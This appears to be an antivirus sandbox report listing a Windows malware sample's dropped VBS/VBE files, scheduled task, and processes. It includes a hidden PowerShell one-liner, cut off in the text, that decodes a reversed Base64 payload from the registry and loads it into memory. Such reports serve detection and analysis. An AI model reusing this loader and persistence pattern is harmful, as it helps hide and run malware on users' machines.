Technical Information
- <SYSTEM32>\tasks\aslimtkmoxzysxm
- %ALLUSERSPROFILE%\myfile.vbe
- %APPDATA%\aslimtkmoxzysxm.vbs
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\MyFile.vbe"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\asliMtkMoXZYSxM.VBS"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $r='HKCU:\Software\asliMtkMoXZYSxM';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($...
- '<SYSTEM32>\taskeng.exe' {3A4F4A4E-C360-40F3-B932-4B54CA564EB6} S-1-5-21-3150914307-1777937420-491476919-1000:vmvdhvherewx\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\MyFile.vbe"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $r='HKCU:\Software\asliMtkMoXZYSxM';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($...' (with hidden window)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\asliMtkMoXZYSxM.VBS"' (with hidden window)